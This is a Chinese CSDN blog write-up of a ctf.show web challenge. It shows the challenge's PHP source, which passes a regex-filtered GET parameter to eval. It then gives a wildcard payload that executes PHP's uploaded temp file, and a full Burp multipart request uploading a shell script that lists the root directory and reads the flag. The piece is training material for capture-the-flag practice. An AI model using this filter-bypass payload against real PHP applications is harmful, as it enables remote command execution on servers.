CTFshow--web--红包题第二弹

最新推荐文章于 2024-04-22 17:44:19 发布
最新推荐文章于 2024-04-22 17:44:19 发布
阅读量982 收藏 3
点赞数 3
文章标签: 前端 html php 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45908624/article/details/128786662
版权

查看源代码,按注释提示,构造参数试试?cmd=aa

<?php
#error_reporting(0);
?>
<html lang="zh-CN">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width  minimum-scale=1.0  maximum-scale=1.0  initial-scale=1.0" />
    <title>ctf.show_红包题</title>
</head>
<body>
    <center>
    <h2>ctf.show_红包题</h2>
    <h4>where is the flag?</h4>
    </center>
    <!-- hint:?cmd= -->
    <?php
        if(isset($_GET['cmd'])){
            $cmd=$_GET['cmd'];
            highlight_file(__FILE__);
            if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){
            
                die("cerror");
            }
            if(preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)){
                die("serror");
            }
            eval($cmd);
        
        }
    
     ?>

</body>
</html>

源码中过滤了很多东西,可以使用的字符:p ` ? / + < > =

通过可用的字符构造cmd=?><?=`.+/??p/p?p??????`,由eval($cmd)来运行临时文件

备注:问号?代表一个任意字符,通配符/??p/p?p??????匹配/tmp/phpxxxxxx

构造payload

?cmd=?><?=`.+/??p/p?p??????`;

然后bp抓包,修改这几个地方,发现根目录下有flag.txt

POST /?cmd=?><?=`.+/??p/p?p??????`; HTTP/1.1
Host: 4947507e-e5ac-452c-8f01-80f5309742d9.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------10242300956292313528205888
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 237

-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/sh

ls /
-----------------------------10242300956292313528205888--

修改命令为cat /flag.txt 得到flag

LZ_KaiHuang
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf.show_红包 第二
qq_74414939的博客
09-28 301
进入页面,打开f12,发现提示,可能存在cmd命令注入。之后尝试在url对cmd进行注入,发现了一段php代码可以发现,服务器过滤了大部分字母和符号,只剩下p,+,点,/,反引号,等。于是我们选择上传一个脚本文件进行执行。于是我们用burpsuite抓包获取请求头.
【青少年CTF】“Flag在哪里?”解记录
qq_64868579的博客
06-04 1291
例如“Flag在哪里?青少年CTF训练平台:www.qsnctf.com。复制以后选择其中qsnctf{}部分提交即可。第一反应就是查看网页源代码寻找flag。描述中并没有给出什么有用的信息。博主用户名:Fourstar.一般来讲有关于直接问Flag的。开启Game-Box目环境。但是右键或者选中都没有用。所以直接F12进入检查。
ctfshow-web红包第二
最新发布
2202_75812594的博客
04-22 1642
其实就是一个无字母webshell,只是手法问。第一个waf里面过滤了字母(但留下一个p)、数字和“$”。则我们不能通过动态函数的方法来执行webshell,包括自增。第二个waf中,过滤了我们常用的一些符号。
ctfshow web系列
RealIiikun的博客
04-07 940
源代码要求v1为为字母,v2为数字,并且v1与v2的md5值相同md5漏洞介绍:PHP在处理字符串时,它把每一个以“0E”开头的哈希值都解释为0所以只要v1与v2的md5值以0E开头即可。常见的0e开头的MD5和原值QNKCDZO240610708。
无字母数字的命令执行(ctfshow web入门 55)
Firebasky的博客
09-10 1万+
这几天都没有怎么学习,基本上都是复习学科知识,因为我们要期末考试。刚刚好今天有时间来做了一道命令执行的,再一次拜读了 p神的文章。受益匪浅。 直接进入正 源代码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1x.
ctfshow-web-红包 辟邪剑谱
HAI_WD的博客
09-14 314
文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取。
ctfshow-VIP目-Web-详细解思路
01-27
CTFSHOW-VIP目-Web-详细解思路 本文档总结了CTFSHOW-VIP目-Web的详细解思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFShow-周末大挑战parse-url篇Writeup
05-19
第二关中,URL编码的方式被用来绕过过滤。`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c`解码后是`http://data:://test/plain;base64,`,后面跟着Base64...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow-web-红包 耗子尾汁
HAI_WD的博客
09-08 234
ctfshow-web-红包 耗子尾汁
Bugku CTF---where is flag 4
3tefanie丶zhou的博客
11-29 2413
【天上皎皎明月光,人间匆匆少年郎,脚步最匆匆】
Python图片转base64
热门推荐
XerCis的博客
09-09 1万+
base64 是一种用于传输 8Bit 字节码的编码方式,基于 64 个可打印字符来表示二进制数据
CTFSHOW 红包第二学习
qq_51558360的博客
04-02 1072
PHP上传机制 php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下,这里为/tmp,而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能,我们只要上传了文件,该文件就会被上传到upload_tmp_dir配置的目录下,上传完后会被删除。 PHP命令执行 eval($cmd); 执行命令方式: system('ls'); echo(`ls`); echo+反引号 ?><?=`ls`; <?=是echo()的别名用法,不需要开
CTF解三 逆向 where is your flag(ISCC2017)
LJFYYJ的博客
07-11 2983
直接进入test函数: 下面的代码进行第一步操作: 首先a1的长度应该为19。 接下来对s2进行异或处理。 目中给出的s2的值如下: s2 = 0x3929531D01070A00LL; v4 = 0x391257391F150703LL; v5 = 0x150F; v6 = 0x1B; s2是int64类型,共有8个字节。由于s2、v4、v5和v6的地址是相连的,所以当...
ctf GetFlag
cs_xiaoqiang的博客
01-18 5969
今天好不容易将这道做出来了,来与大家分享分享。目如下:访问连接:   http://106.75.26.211:2222   先查看源码,没有任何发现。但是在页面上发现一个登陆窗口,跳转到登陆窗口。并且发现验证码是纯数字的md5的值取最前面的6位,那么可以自己写一个脚本来跑 有了验证码之后,本来是准备尝试爆破的。可是发现每访问一次验证码都会改变,所以这条路明显行不通。经过多次的尝试之后发现登陆
ctfshow-web-web红包
07-14
ctfshow-web-web红包是一道CTF比赛中的网络安全目。这道目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值